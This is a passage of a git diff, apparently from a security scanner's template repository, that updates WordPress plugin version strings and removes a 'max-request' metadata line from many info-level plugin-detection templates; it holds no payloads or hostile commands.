.../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 213 files changed, 14 insertions(+), 214 deletions(-) diff --git a/helpers/wordpress/plugins/akismet.txt b/helpers/wordpress/plugins/akismet.txt index 341d0b550f..11aa145248 100644 --- a/helpers/wordpress/plugins/akismet.txt +++ b/helpers/wordpress/plugins/akismet.txt @@ -1 +1 @@ -5.2 \ No newline at end of file +5.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/antispam-bee.txt b/helpers/wordpress/plugins/antispam-bee.txt index ac569006a9..e13ec79f55 100644 --- a/helpers/wordpress/plugins/antispam-bee.txt +++ b/helpers/wordpress/plugins/antispam-bee.txt @@ -1 +1 @@ -2.11.3 \ No newline at end of file +2.11.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index fbcbf73806..8cf6caf561 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -3.4.0 \ No newline at end of file +3.4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/code-snippets.txt b/helpers/wordpress/plugins/code-snippets.txt index a423d4217b..e5b820341f 100644 --- a/helpers/wordpress/plugins/code-snippets.txt +++ b/helpers/wordpress/plugins/code-snippets.txt @@ -1 +1 @@ -3.4.2 \ No newline at end of file +3.5.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index 41fd4c1f54..610ddad1b1 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.16.1 \ No newline at end of file +3.16.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/force-regenerate-thumbnails.txt b/helpers/wordpress/plugins/force-regenerate-thumbnails.txt index 8f9174b4dd..abae0d9a94 100644 --- a/helpers/wordpress/plugins/force-regenerate-thumbnails.txt +++ b/helpers/wordpress/plugins/force-regenerate-thumbnails.txt @@ -1 +1 @@ -2.1.2 \ No newline at end of file +2.1.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/forminator.txt b/helpers/wordpress/plugins/forminator.txt index 2aa7a9648c..bc584045a3 100644 --- a/helpers/wordpress/plugins/forminator.txt +++ b/helpers/wordpress/plugins/forminator.txt @@ -1 +1 @@ -1.25.2 \ No newline at end of file +1.26.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack-boost.txt b/helpers/wordpress/plugins/jetpack-boost.txt index f93ea0ca33..7c32728738 100644 --- a/helpers/wordpress/plugins/jetpack-boost.txt +++ b/helpers/wordpress/plugins/jetpack-boost.txt @@ -1 +1 @@ -2.0.2 \ No newline at end of file +2.1.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/nextgen-gallery.txt b/helpers/wordpress/plugins/nextgen-gallery.txt index 85ec80b2a9..423638af67 100644 --- a/helpers/wordpress/plugins/nextgen-gallery.txt +++ b/helpers/wordpress/plugins/nextgen-gallery.txt @@ -1 +1 @@ -3.37 \ No newline at end of file +3.39 \ No newline at end of file diff --git a/helpers/wordpress/plugins/redux-framework.txt b/helpers/wordpress/plugins/redux-framework.txt index 5f7049803b..b58299c38c 100644 --- a/helpers/wordpress/plugins/redux-framework.txt +++ b/helpers/wordpress/plugins/redux-framework.txt @@ -1 +1 @@ -4.4.5 \ No newline at end of file +4.4.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt index 0df17dd0f6..30bc70ba1b 100644 --- a/helpers/wordpress/plugins/the-events-calendar.txt +++ b/helpers/wordpress/plugins/the-events-calendar.txt @@ -1 +1 @@ -6.2.1 \ No newline at end of file +6.2.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index 8122ad0173..024a87fcf5 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.7.8 \ No newline at end of file +2.7.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt index b7bc73b808..77de6fb1b9 100644 --- a/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt +++ b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt @@ -1 +1 @@ -3.24.0 \ No newline at end of file +3.25.0 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..f68ad2a6bf 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -1,13 +1,12 @@ id: wordpress-akismet info: - name: Akismet Anti-Spam' Spam Protection Detection + name: Akismet Anti-spam' Spam Protection Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 